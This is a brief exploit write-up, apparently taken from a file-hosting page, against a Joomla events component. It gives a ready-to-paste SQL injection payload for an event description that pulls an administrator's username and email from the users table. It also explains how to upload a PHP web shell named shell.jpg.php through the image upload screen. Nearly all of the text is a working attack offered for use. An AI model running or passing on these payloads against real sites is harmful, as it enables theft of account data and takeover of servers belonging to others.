21 lines
No EOL
488 B
Text
21 lines
No EOL
488 B
Text
SQL Injection
|
|
-------------
|
|
|
|
requires: magic quotes OFF, user account
|
|
|
|
Add this as the description of a new event:
|
|
|
|
'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25
|
|
LIMIT 1),1,1,1) -- '
|
|
|
|
NOTE: 63 MUST be your Joomla user ID. extracted info can be found on
|
|
View Events page
|
|
|
|
|
|
Remote File Inclusion
|
|
---------------------
|
|
|
|
requires: user account
|
|
|
|
Just upload your PHP shell (shell.jpg.php) through the Add Image screen,
|
|
and find it's new URL in the View Images screen. |